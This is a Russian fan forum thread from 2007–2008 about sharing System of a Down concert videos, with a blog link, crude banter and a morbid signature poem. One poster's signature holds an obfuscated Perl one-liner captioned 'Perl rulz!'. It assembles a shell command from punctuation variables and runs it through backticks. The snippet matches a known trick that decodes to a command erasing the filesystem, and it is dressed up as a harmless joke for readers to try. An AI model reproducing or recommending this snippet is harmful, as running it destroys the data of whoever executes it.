Добавлено: Вт Ноя 13, 2007 4:35 pm Заголовок сообщения: Видео System of a Down
заметил, что админы сайта не торопятся выкладывать свои богатства на сайт, я имею ввиду записи концертов. все наверно заметили, что в разделе видео лежат далеко не все видюшки, где светятся системщики. soad.msk.ru - лучший сайт о группе, но хотелось бы чтобы "НО" упоминалось как можно реже.
короче к делу. предлагаю выкладывать тут ссылки на видео системы, которых нет на сайте.
сразу напишу классное место, где есть пара записей отличного качества. кроме того там очень много редкого видео других альтернатив групп. http://nuvidz.blogspot.com/ . ройтесь в колонке Archivos
времени нет у нас _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Я могу найти свой пенис, но захочет ли этого Maynard
)) _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
я могу найти Maynard'а, но захочит ли этого твой пенис _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Добавлено: Вс Май 11, 2008 11:51 pm Заголовок сообщения:
ммм...*ностальгия по пенису,Мэйнарду и всё такое* _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
значит так: ты написал "личка", знака вопроса нету, прозрачных знаков указывающих, что с этой "личкой" делать я тоже не заметил, отсюда вывод: это флуд. Я конечно понимаю можно было и додуматься, что нужно проверить свой личный ящик, или в моём случае, то как это понял я.
Если ты с этим не согласен, то и не требуй от других нормальных, связанных по смыслу и построению фраз и предложений.
можно было и додуматься, что нужно проверить свой личный ящик
вот и ответил сам на свой вопрос ) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!